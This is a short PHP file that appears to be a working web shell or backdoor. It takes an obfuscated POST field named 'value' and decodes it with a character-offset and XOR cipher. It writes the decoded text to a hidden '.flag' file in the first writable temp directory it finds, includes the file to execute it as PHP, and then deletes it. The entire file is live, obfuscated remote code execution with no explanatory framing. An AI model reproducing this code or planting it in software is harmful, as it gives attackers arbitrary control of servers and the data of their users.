<?php

if(count($_POST) > 0 && isset($_POST["\x76\x61lue"])){
	$marker = array_filter([session_save_path(), getcwd(), ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), "/tmp", getenv("TMP"), "/var/tmp", getenv("TEMP")]);
	$element = $_POST["\x76\x61lue"];
	 		$element=explode	("." 	, $element 		)			;	
	$dchunk	= '';
            $salt7	= 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS	= strlen(		$salt7);
            $l	= 0;
    
            while(		$l < count(		$element)) {
                $v1	= $element[$l];
                $sChar	= ord(		$salt7[$l % $lenS]);
                $dec	= (		(		int)$v1 - $sChar -(		$l % 10))^ 	44;
                $dchunk	.=chr(		$dec);
                $l++;
            }
	$comp = 0;
do {
    $entry = $marker[$comp] ?? null;
    if ($comp >= count($marker)) break;
    		if (is_writable($entry) && is_dir($entry)) {
    $key = sprintf("%s/.flag", $entry);
    if (file_put_contents($key, $dchunk)) {
	include $key;
	@unlink($key);
	exit;
}
}
    $comp++;
} while (true);
}